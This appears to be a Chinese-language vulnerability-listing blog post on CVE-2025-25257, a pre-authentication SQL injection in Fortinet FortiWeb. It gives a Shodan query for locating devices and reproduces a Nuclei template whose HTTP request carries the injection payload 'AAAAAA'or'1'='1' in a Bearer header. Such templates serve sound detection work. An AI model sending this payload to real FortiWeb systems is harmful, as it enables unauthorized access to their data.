Fortinet FortiWeb SQL注入漏洞

漏洞信息

漏洞名称: Fortinet FortiWeb SQL注入漏洞

漏洞编号:

  • CVE: CVE-2025-25257

漏洞类型: SQL注入

漏洞等级: 严重

漏洞描述: Fortinet FortiWeb是一款企业级的Web应用防火墙(WAF),旨在保护Web应用免受各种网络攻击,如SQL注入、跨站脚本(XSS)等。它广泛应用于企业环境中,用于保护关键的Web应用和数据安全。该产品因其强大的防护能力和易用性而受到许多组织的青睐。

该漏洞属于SQL注入类型(CWE-89),由于FortiWeb未能正确中和SQL命令中使用的特殊元素,导致未认证的攻击者可以通过精心构造的HTTP或HTTPS请求执行未经授权的SQL代码或命令。这种漏洞的根本原因在于输入验证不足,使得攻击者能够操纵SQL查询,从而绕过安全措施。

此漏洞的影响极为严重,攻击者可以利用它执行任意SQL命令,可能导致数据泄露、数据篡改或系统完全被控制。由于攻击者无需认证即可利用此漏洞,且可以通过网络远程执行攻击,因此其潜在危害非常大。此外,这种漏洞可能被自动化工具利用,进一步增加了其危险性。Fortinet已发布安全补丁来修复此漏洞,建议所有用户立即应用最新的安全更新以防止潜在的攻击。

产品厂商: Fortinet

产品名称: FortiWeb

影响版本: *

搜索语法: ssl:”cn=fortiweb” title:”FortiWeb - “

来源: https://github.com/projectdiscovery/nuclei-templates/blob/82f786af1f11be053bb876404b85bbdba7fd4dac/http%2Fcves%2F2025%2FCVE-2025-25257.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52

id: CVE-2025-25257

info:
  name: Fortinet FortiWeb - SQL Injection
  author: watchtowr,johnk3r
  severity: critical
  description: An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] in FortiWeb may allow an unauthenticated attacker to execute unauthorized SQL code or commands via crafted HTTP or HTTPs requests.
  impact: |
    An attacker can exploit this vulnerability to execute unauthorized SQL commands, potentially leading to data exposure, data manipulation, or system compromise.
  remediation: |
    Apply the latest security patches provided by Fortinet to fix the SQL injection vulnerability in FortiWeb.
  reference:
    - https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/
    - https://fortiguard.fortinet.com/psirt/FG-IR-25-151
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-25257
    cwe-id: CWE-89
    cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fortinet
    product: fortiweb
    shodan-query:
        - ssl:"cn=fortiweb"
        - title:"FortiWeb - "
  tags: cve,cve2025,fortinet,fortiweb,sqli

http:
  - raw:
      - |
        GET /api/fabric/device/status HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer AAAAAA'or'1'='1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'serial'
          - 'fortiweb'
        condition: and

      - type: status
        status:
          - 200


Github Poc
#projectdiscovery/nuclei-templates:github issues #SQL注入
Fortinet FortiWeb SQL注入漏洞
http://example.com/2025/07/25/github_2866746662/
作者
lianccc
发布于
2025年7月25日
许可协议